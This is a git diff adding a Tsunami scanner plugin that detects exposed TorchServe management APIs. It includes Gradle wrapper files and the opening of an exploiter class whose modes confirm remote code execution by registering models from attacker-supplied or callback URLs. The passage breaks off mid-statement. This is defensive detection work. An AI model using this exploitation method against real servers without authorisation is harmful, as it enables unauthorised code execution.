zd53q3N(s$Eu{R}k2esbftfjfOITCL;jWa$}(mmm}d(&7JZ6d3%IABCapFFYjdEjdK z&4Edqf$G^MNAtL=uCDRs&Fu@FXRgX{*0<(@c3|PNHa>L%zvxWS={L8%qw`STm+=Rd zA}FLspESSIpE_^41~#5yI2bJ=9`oc;GIL!JuW&7YetZ?0H}$$%8rW@*J37L-~Rsx!)8($nI4 zZhcZ2^=Y+p4YPl%j!nFJA|*M^gc(0o$i3nlphe+~-_m}jVkRN{spFs(o0ajW@f3K{ zDV!#BwL322CET$}Y}^0ixYj2w>&Xh12|R8&yEw|wLDvF!lZ#dOTHM9pK6@Nm-@9Lnng4ZHBgBSrr7KI8YCC9DX5Kg|`HsiwJHg2(7#nS;A{b3tVO?Z% za{m5b3rFV6EpX;=;n#wltDv1LE*|g5pQ+OY&*6qCJZc5oDS6Z6JD#6F)bWxZSF@q% z+1WV;m!lRB!n^PC>RgQCI#D1br_o^#iPk>;K2hB~0^<~)?p}LG%kigm@moD#q3PE+ zA^Qca)(xnqw6x>XFhV6ku9r$E>bWNrVH9fum0?4s?Rn2LG{Vm_+QJHse6xa%nzQ?k zKug4PW~#Gtb;#5+9!QBgyB@q=sk9=$S{4T>wjFICStOM?__fr+Kei1 z3j~xPqW;W@YkiUM;HngG!;>@AITg}vAE`M2Pj9Irl4w1fo4w<|Bu!%rh%a(Ai^Zhi zs92>v5;@Y(Zi#RI*ua*h`d_7;byQSa*v9E{2x$<-_=5Z<7{%)}4XExANcz@rK69T0x3%H<@frW>RA8^swA+^a(FxK| zFl3LD*ImHN=XDUkrRhp6RY5$rQ{bRgSO*(vEHYV)3Mo6Jy3puiLmU&g82p{qr0F?ohmbz)f2r{X2|T2 z$4fdQ=>0BeKbiVM!e-lIIs8wVTuC_m7}y4A_%ikI;Wm5$9j(^Y z(cD%U%k)X>_>9~t8;pGzL6L-fmQO@K; zo&vQzMlgY95;1BSkngY)e{`n0!NfVgf}2mB3t}D9@*N;FQ{HZ3Pb%BK6;5#-O|WI( zb6h@qTLU~AbVW#_6?c!?Dj65Now7*pU{h!1+eCV^KCuPAGs28~3k@ueL5+u|Z-7}t z9|lskE`4B7W8wMs@xJa{#bsCGDFoRSNSnmNYB&U7 zVGKWe%+kFB6kb)e;TyHfqtU6~fRg)f|>=5(N36)0+C z`hv65J<$B}WUc!wFAb^QtY31yNleq4dzmG`1wHTj=c*=hay9iD071Hc?oYoUk|M*_ zU1GihAMBsM@5rUJ(qS?9ZYJ6@{bNqJ`2Mr+5#hKf?doa?F|+^IR!8lq9)wS3tF_9n zW_?hm)G(M+MYb?V9YoX^_mu5h-LP^TL^!Q9Z7|@sO(rg_4+@=PdI)WL(B7`!K^ND- z-uIuVDCVEdH_C@c71YGYT^_Scf_dhB8Z2Xy6vGtBSlYud9vggOqv^L~F{BraSE_t} zIkP+Hp2&nH^-MNEs}^`oMLy11`PQW$T|K(`Bu*(f@)mv1-qY(_YG&J2M2<7k;;RK~ zL{Fqj9yCz8(S{}@c)S!65aF<=&eLI{hAMErCx&>i7OeDN>okvegO87OaG{Jmi<|}D zaT@b|0X{d@OIJ7zvT>r+eTzgLq~|Dpu)Z&db-P4z*`M$UL51lf>FLlq6rfG)%doyp z)3kk_YIM!03eQ8Vu_2fg{+osaEJPtJ-s36R+5_AEG12`NG)IQ#TF9c@$99%0iye+ zUzZ57=m2)$D(5Nx!n)=5Au&O0BBgwxIBaeI(mro$#&UGCr<;C{UjJVAbVi%|+WP(a zL$U@TYCxJ=1{Z~}rnW;7UVb7+ZnzgmrogDxhjLGo>c~MiJAWs&&;AGg@%U?Y^0JhL ze(x6Z74JG6FlOFK(T}SXQfhr}RIFl@QXKnIcXYF)5|V~e-}suHILKT-k|<*~Ij|VF zC;t@=uj=hot~*!C68G8hTA%8SzOfETOXQ|3FSaIEjvBJp(A)7SWUi5!Eu#yWgY+;n 
zlm<$+UDou*V+246_o#V4kMdto8hF%%Lki#zPh}KYXmMf?hrN0;>Mv%`@{0Qn`Ujp) z=lZe+13>^Q!9zT);H<(#bIeRWz%#*}sgUX9P|9($kexOyKIOc`dLux}c$7It4u|Rl z6SSkY*V~g_B-hMPo_ak>>z@AVQ(_N)VY2kB3IZ0G(iDUYw+2d7W^~(Jq}KY=JnWS( z#rzEa&0uNhJ>QE8iiyz;n2H|SV#Og+wEZv=f2%1ELX!SX-(d3tEj$5$1}70Mp<&eI zCkfbByL7af=qQE@5vDVxx1}FSGt_a1DoE3SDI+G)mBAna)KBG4p8Epxl9QZ4BfdAN zFnF|Y(umr;gRgG6NLQ$?ZWgllEeeq~z^ZS7L?<(~O&$5|y)Al^iMKy}&W+eMm1W z7EMU)u^ke(A1#XCV>CZ71}P}0x)4wtHO8#JRG3MA-6g=`ZM!FcICCZ{IEw8Dm2&LQ z1|r)BUG^0GzI6f946RrBlfB1Vs)~8toZf~7)+G;pv&XiUO(%5bm)pl=p>nV^o*;&T z;}@oZSibzto$arQgfkp|z4Z($P>dTXE{4O=vY0!)kDO* zGF8a4wq#VaFpLfK!iELy@?-SeRrdz%F*}hjKcA*y@mj~VD3!it9lhRhX}5YOaR9$} z3mS%$2Be7{l(+MVx3 z(4?h;P!jnRmX9J9sYN#7i=iyj_5q7n#X(!cdqI2lnr8T$IfOW<_v`eB!d9xY1P=2q&WtOXY=D9QYteP)De?S4}FK6#6Ma z=E*V+#s8>L;8aVroK^6iKo=MH{4yEZ_>N-N z`(|;aOATba1^asjxlILk<4}f~`39dBFlxj>Dw(hMYKPO3EEt1@S`1lxFNM+J@uB7T zZ8WKjz7HF1-5&2=l=fqF-*@>n5J}jIxdDwpT?oKM3s8Nr`x8JnN-kCE?~aM1H!hAE z%%w(3kHfGwMnMmNj(SU(w42OrC-euI>Dsjk&jz3ts}WHqmMpzQ3vZrsXrZ|}+MHA7 z068obeXZTsO*6RS@o3x80E4ok``rV^Y3hr&C1;|ZZ0|*EKO`$lECUYG2gVFtUTw)R z4Um<0ZzlON`zTdvVdL#KFoMFQX*a5wM0Czp%wTtfK4Sjs)P**RW&?lP$(<}q%r68Z zS53Y!d@&~ne9O)A^tNrXHhXBkj~$8j%pT1%%mypa9AW5E&s9)rjF4@O3ytH{0z6riz|@< zB~UPh*wRFg2^7EbQrHf0y?E~dHlkOxof_a?M{LqQ^C!i2dawHTPYUE=X@2(3<=OOxs8qn_(y>pU>u^}3y&df{JarR0@VJn0f+U%UiF=$Wyq zQvnVHESil@d|8&R<%}uidGh7@u^(%?$#|&J$pvFC-n8&A>utA=n3#)yMkz+qnG3wd zP7xCnF|$9Dif@N~L)Vde3hW8W!UY0BgT2v(wzp;tlLmyk2%N|0jfG$%<;A&IVrOI< z!L)o>j>;dFaqA3pL}b-Je(bB@VJ4%!JeX@3x!i{yIeIso^=n?fDX`3bU=eG7sTc%g%ye8$v8P@yKE^XD=NYxTb zbf!Mk=h|otpqjFaA-vs5YOF-*GwWPc7VbaOW&stlANnCN8iftFMMrUdYNJ_Bnn5Vt zxfz@Ah|+4&P;reZxp;MmEI7C|FOv8NKUm8njF7Wb6Gi7DeODLl&G~}G4be&*Hi0Qw z5}77vL0P+7-B%UL@3n1&JPxW^d@vVwp?u#gVcJqY9#@-3X{ok#UfW3<1fb%FT`|)V~ggq z(3AUoUS-;7)^hCjdT0Kf{i}h)mBg4qhtHHBti=~h^n^OTH5U*XMgDLIR@sre`AaB$ zg)IGBET_4??m@cx&c~bA80O7B8CHR7(LX7%HThkeC*@vi{-pL%e)yXp!B2InafbDF zjPXf1mko3h59{lT6EEbxKO1Z5GF71)WwowO6kY|6tjSVSWdQ}NsK2x{>i|MKZK8%Q 
zfu&_0D;CO-Jg0#YmyfctyJ!mRJp)e#@O0mYdp|8x;G1%OZQ3Q847YWTyy|%^cpA;m zze0(5p{tMu^lDkpe?HynyO?a1$_LJl2L&mpeKu%8YvgRNr=%2z${%WThHG=vrWY@4 zsA`OP#O&)TetZ>s%h!=+CE15lOOls&nvC~$Qz0Ph7tHiP;O$i|eDwpT{cp>+)0-|; zY$|bB+Gbel>5aRN3>c0x)4U=|X+z+{ zn*_p*EQoquRL+=+p;=lm`d71&1NqBz&_ph)MXu(Nv6&XE7(RsS)^MGj5Q?Fwude-(sq zjJ>aOq!7!EN>@(fK7EE#;i_BGvli`5U;r!YA{JRodLBc6-`n8K+Fjgwb%sX;j=qHQ z7&Tr!)!{HXoO<2BQrV9Sw?JRaLXV8HrsNevvnf>Y-6|{T!pYLl7jp$-nEE z#X!4G4L#K0qG_4Z;Cj6=;b|Be$hi4JvMH!-voxqx^@8cXp`B??eFBz2lLD8RRaRGh zn7kUfy!YV~p(R|p7iC1Rdgt$_24i0cd-S8HpG|`@my70g^y`gu%#Tf_L21-k?sRRZHK&at(*ED0P8iw{7?R$9~OF$Ko;Iu5)ur5<->x!m93Eb zFYpIx60s=Wxxw=`$aS-O&dCO_9?b1yKiPCQmSQb>T)963`*U+Ydj5kI(B(B?HNP8r z*bfSBpSu)w(Z3j7HQoRjUG(+d=IaE~tv}y14zHHs|0UcN52fT8V_<@2ep_ee{QgZG zmgp8iv4V{k;~8@I%M3<#B;2R>Ef(Gg_cQM7%}0s*^)SK6!Ym+~P^58*wnwV1BW@eG z4sZLqsUvBbFsr#8u7S1r4teQ;t)Y@jnn_m5jS$CsW1um!p&PqAcc8!zyiXHVta9QC zY~wCwCF0U%xiQPD_INKtTb;A|Zf29(mu9NI;E zc-e>*1%(LSXB`g}kd`#}O;veb<(sk~RWL|f3ljxCnEZDdNSTDV6#Td({6l&y4IjKF z^}lIUq*ZUqgTPumD)RrCN{M^jhY>E~1pn|KOZ5((%F)G|*ZQ|r4zIbrEiV%42hJV8 z3xS)=!X1+=olbdGJ=yZil?oXLct8FM{(6ikLL3E%=q#O6(H$p~gQu6T8N!plf!96| z&Q3=`L~>U0zZh;z(pGR2^S^{#PrPxTRHD1RQOON&f)Siaf`GLj#UOk&(|@0?zm;Sx ztsGt8=29-MZs5CSf1l1jNFtNt5rFNZxJPvkNu~2}7*9468TWm>nN9TP&^!;J{-h)_ z7WsHH9|F%I`Pb!>KAS3jQWKfGivTVkMJLO-HUGM_a4UQ_%RgL6WZvrW+Z4ujZn;y@ zz9$=oO!7qVTaQAA^BhX&ZxS*|5dj803M=k&2%QrXda`-Q#IoZL6E(g+tN!6CA!CP* zCpWtCujIea)ENl0liwVfj)Nc<9mV%+e@=d`haoZ*`B7+PNjEbXBkv=B+Pi^~L#EO$D$ZqTiD8f<5$eyb54-(=3 zh)6i8i|jp(@OnRrY5B8t|LFXFQVQ895n*P16cEKTrT*~yLH6Z4e*bZ5otpRDri&+A zfNbK1D5@O=sm`fN=WzWyse!za5n%^+6dHPGX#8DyIK>?9qyX}2XvBWVqbP%%D)7$= z=#$WulZlZR<{m#gU7lwqK4WS1Ne$#_P{b17qe$~UOXCl>5b|6WVh;5vVnR<%d+Lnp z$uEmML38}U4vaW8>shm6CzB(Wei3s#NAWE3)a2)z@i{4jTn;;aQS)O@l{rUM`J@K& l00vQ5JBs~;vo!vr%%-k{2_Fq1Mn4QF81S)AQ99zk{{c4yR+0b! literal 0 HcmV?d00001 
diff --git a/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties
new file mode 100644
index 000000000..1af9e0930
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties
@@ -0,0 +1,7 @@
+distributionBase=GRADLE_USER_HOME
+distributionPath=wrapper/dists
+distributionUrl=https\://services.gradle.org/distributions/gradle-8.5-bin.zip
+networkTimeout=10000
+validateDistributionUrl=true
+zipStoreBase=GRADLE_USER_HOME
+zipStorePath=wrapper/dists
diff --git a/doyensec/detectors/rce/torchserve/gradlew b/doyensec/detectors/rce/torchserve/gradlew
new file mode 100755
index 000000000..1aa94a426
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/gradlew
@@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/doyensec/detectors/rce/torchserve/gradlew.bat b/doyensec/detectors/rce/torchserve/gradlew.bat new file mode 100644 index 000000000..93e3f59f1 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/gradlew.bat 
@@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 
+echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/doyensec/detectors/rce/torchserve/settings.gradle b/doyensec/detectors/rce/torchserve/settings.gradle new file mode 100644 index 000000000..ef90a3ace --- /dev/null +++ b/doyensec/detectors/rce/torchserve/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'torchserve_management_api' diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java new file mode 100644 index 000000000..28ceb5af1 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java 
@@ -0,0 +1,900 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import static com.google.common.base.Preconditions.checkNotNull;
+
+import com.google.common.flogger.GoogleLogger;
+import com.google.gson.Gson;
+import com.google.gson.GsonBuilder;
+import com.google.gson.JsonArray;
+import com.google.gson.JsonElement;
+import com.google.gson.JsonObject;
+import com.google.gson.JsonParseException;
+import com.google.gson.JsonParser;
+import com.google.tsunami.common.data.NetworkServiceUtils;
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpHeaders;
+import com.google.tsunami.common.net.http.HttpMethod;
+import com.google.tsunami.common.net.http.HttpRequest;
+import com.google.tsunami.common.net.http.HttpResponse;
+import com.google.tsunami.plugin.payload.Payload;
+import com.google.tsunami.plugin.payload.PayloadGenerator;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.PayloadGeneratorConfig;
+import com.google.tsunami.proto.Severity;
+import java.io.IOException;
+import java.security.MessageDigest;
+import java.time.Instant;
+import java.util.ArrayList;
+import java.util.List;
+import javax.inject.Inject;
+import okhttp3.HttpUrl;
+import org.checkerframework.checker.nullness.qual.Nullable;
+
+public class TorchServeExploiter {
+ private static final GoogleLogger logger
= GoogleLogger.forEnclosingClass(); + private final HttpClient httpClient; + public final Details details; + private final PayloadGenerator payloadGenerator; + private final TorchServeManagementAPIExploiterWebServer webServer; + private Payload payload; + public TorchServeRandomUtils randomUtils; + + enum ExploitationMode { + // Just detect the TorchServe Management API, do not attempt to exploit. + BASIC, + // Provide Tsunami callback server's URL as a model source, consider any callback as a + // confirmation. + SSRF, + // Provide a static URL as a model source, verify code execution directly. + STATIC, + // Serve a model locally, verify code execution directly. + LOCAL + } + + public class Details { + // Effective settings (merged from config file and cli args) + public ExploitationMode exploitationMode; + public String staticUrl; + public String localBindHost; + public int localBindPort; + public String localAccessibleUrl; + + // Data collected during the exploit + public List models; + public boolean hashVerification = false; + public boolean callbackVerification = false; + public String systemInfo; + public boolean cleanupFailed = false; + public String modelName; + public String targetUrl; + public String exploitUrl; + public String messageLogged; + + static final String LOG_MESSAGE = + "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + + " for details. No malicious activity intended. Timestamp: %s"; + + /** + * Constructor for Details class. Initializes the details with configuration and command line + * arguments. + * + * @param config Configuration object. + * @param args Command line arguments. 
+ */ + public Details(TorchServeManagementApiConfig config, TorchServeManagementApiArgs args) { + initializeExploitationMode(args, config); + initializeUrls(args, config); + validateParameters(); + } + + private void initializeExploitationMode( + TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) { + String mode = args.exploitationMode != null ? args.exploitationMode : config.exploitationMode; + if (mode.equals("auto")) { + this.exploitationMode = + payloadGenerator.isCallbackServerEnabled() + ? ExploitationMode.SSRF + : ExploitationMode.BASIC; + } else { + this.exploitationMode = ExploitationMode.valueOf(mode.toUpperCase()); + } + } + + private void initializeUrls( + TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) { + this.staticUrl = args.staticUrl != null ? args.staticUrl : config.staticUrl; + this.localBindHost = args.localBindHost != null ? args.localBindHost : config.localBindHost; + this.localBindPort = args.localBindPort != 0 ? args.localBindPort : config.localBindPort; + this.localAccessibleUrl = + args.localAccessibleUrl != null ? args.localAccessibleUrl : config.localAccessibleUrl; + } + + private void validateParameters() { + if (this.exploitationMode == ExploitationMode.STATIC && this.staticUrl == null) { + throw new IllegalArgumentException( + "Static mode requires --torchserve-management-api-model-static-url"); + } + + if (this.exploitationMode == ExploitationMode.LOCAL) { + if (this.localBindHost == null + || this.localBindPort == 0 + || this.localAccessibleUrl == null) { + throw new IllegalArgumentException( + "Local mode requires --torchserve-management-api-local-bind-host," + + " --torchserve-management-api-local-bind-port and" + + " --torchserve-management-api-local-accessible-url"); + } + } + } + + public Severity getSeverity() { + return isVerified() ? 
Severity.CRITICAL : Severity.LOW; + } + + public boolean isVerified() { + return this.hashVerification || this.callbackVerification; + } + + public String generateDescription() { + StringBuilder description = + new StringBuilder("An exposed TorchServe management API was detected on the target. "); + description.append( + "TorchServe is a model server for PyTorch models. The management API allows adding new" + + " models to the server which by design can be used to execute arbitrary code on the" + + " target.\n"); + description.append( + "This exposure poses a significant security risk as it could allow unauthorized users to" + + " run arbitrary code on the server."); + + switch (this.exploitationMode) { + case SSRF: + description + .append( + "The exploit was confirmed by receiving a callback from the target while adding a" + + " new model with the following details: ") + .append(" - Name: ") + .append(this.modelName) + .append(" - URL: ") + .append(this.exploitUrl); + break; + case STATIC: + case LOCAL: + description + .append( + "The exploit was confirmed by adding a new model to the target with the following" + + " details: ") + .append(" - Name: ") + .append(this.modelName) + .append(" - URL: ") + .append(this.exploitUrl); + break; + default: + break; + } + + return description.toString(); + } + + public String generateAdditionalDetails() { + StringBuilder additionalDetails = new StringBuilder(); + + switch (this.exploitationMode) { + case BASIC: + additionalDetails.append( + "Callback verification is not enabled in Tsunami configuration, so the exploit" + + " could not be confirmed and only the Management API detection is reported." 
+ + " It is recommended to enable callback verification for more conclusive" + + " vulnerability assessment."); + if (this.models != null && !this.models.isEmpty()) { + additionalDetails + .append("\nModels found on the target:\n - ") + .append(String.join("\n - ", this.models)); + } + break; + case SSRF: + additionalDetails.append( + "A callback was received from the target while adding a new model, confirming the" + + " exploit. Code execution was not verified directly. For a more direct" + + " confirmation of remote code execution, consider using STATIC or LOCAL" + + " modes."); + if (this.models != null && !this.models.isEmpty()) { + additionalDetails + .append("\nModels found on the target:\n - ") + .append(String.join("\n - ", this.models)); + } + break; + case STATIC: + case LOCAL: + additionalDetails + .append( + "Code execution was verified by adding a new model to the target and performing" + + " following actions:\n") + .append( + " - Calculating a hash of a random value and comparing it to the value returned" + + " by the target (" + + (this.hashVerification ? "Success" : "Failure") + + ")\n"); + + if (payloadGenerator.isCallbackServerEnabled()) { + additionalDetails.append( + " - Sending a callback to the target and confirming that the callback URL was" + + " received (" + + (this.callbackVerification ? 
